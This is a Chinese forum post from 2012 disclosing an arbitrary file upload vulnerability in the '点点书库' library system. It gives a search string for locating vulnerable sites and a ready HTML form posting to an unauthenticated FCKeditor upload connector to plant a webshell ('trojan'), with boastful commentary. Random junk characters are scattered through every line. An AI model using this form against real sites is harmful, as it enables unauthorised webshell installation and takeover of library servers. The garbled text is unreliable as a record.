主题:图书馆系统任意文件上传漏洞
& R, D7 _& i0 B. c+ ]' H F" s& N% [ 作者:冰锋刺客
+ J( A% q6 W$ s7 i 厂商:点击书(dianjishu.com)
. n7 ^6 n- ]- Z1 u5 j0 E$ G: H 日期:2012-6-21$ P( `; C' w& K+ F2 O+ _# r
. s7 }7 h5 n3 [I 概述/ ~5 r6 m, K' g! U' W) `0 n6 u
点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell! w4 N8 z1 Y1 A4 L" @- B$ v
II 简介, d! x8 G1 \. v$ @
关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"
u: @+ c% u) E, F 补充一个漏洞1 u7 F: b- d% n3 e
<form id="frmUpload" enctype="multipart/form-data"
' v7 k' W+ H+ r action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>/ e, L3 m' e% i) N2 V
<input id="btnUpload" type="submit" value="操翻他">
9 J2 o6 V' P& }2 P! F </form>
6 H0 w8 o- k- p; H3 G. |+ T 你们懂的
$ h$ h: o/ S0 B4 t: R: d 那傻逼提供还需要改包.
- k7 m3 h. B. Q5 Q1 h' ~ 自己看了下源代码发现fckeditor
- |- E9 M+ ?/ V- `+ t# h$ _9 j 直接秒杀
. j8 K! {: t# O! f8 @ |
发表于 2012-9-10 21:20:59
收藏
支持
反对